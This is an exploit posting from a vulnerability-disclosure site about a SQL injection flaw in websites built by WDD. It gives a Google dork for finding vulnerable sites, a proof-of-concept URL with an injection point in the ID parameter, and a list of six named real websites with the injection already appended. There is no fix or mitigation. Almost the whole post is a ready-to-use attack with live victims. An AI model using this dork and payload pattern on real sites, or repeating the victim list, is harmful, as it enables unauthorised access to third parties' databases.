Designed by WDD SQL injection Vulnerability

2015.12.28
Credit: modiret
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#############################In The Name Of God############################## # # Exploit Title : Designed by WDD SQL injection Vulnerability # Exploit Author : modiret # Vendor Homepage : http://www.wddgroup.com/ # Google Dork : intext:"Designed by WDD" inurl:products.php? # Date: 28 Dec 2015 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # PoC: # http://www.qaftin.com/products.php?Type=more&KindID=10&ID=[SQLI] # # Demos : # # http://www.qaftin.com/products.php?Type=more&KindID=10&ID=39%27 # http://ee.bureauveritas.com.tw/products.php?KindID=1%27 # http://www.mblock.com.tw/products.php?KindID=1&ID=111%27 # http://www.mblock.com.tw/products.php?KindID=1&ID=8%27 # http://www.microtekusa.com/products.php/products.php?KindID=105&ID=357%27 # http://www.wddseo.com/mblock/products.php?KindID=2&ID=32%27 ###################### # Contact Me: Yahoo messenger(amodiret@yahoo.com) ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top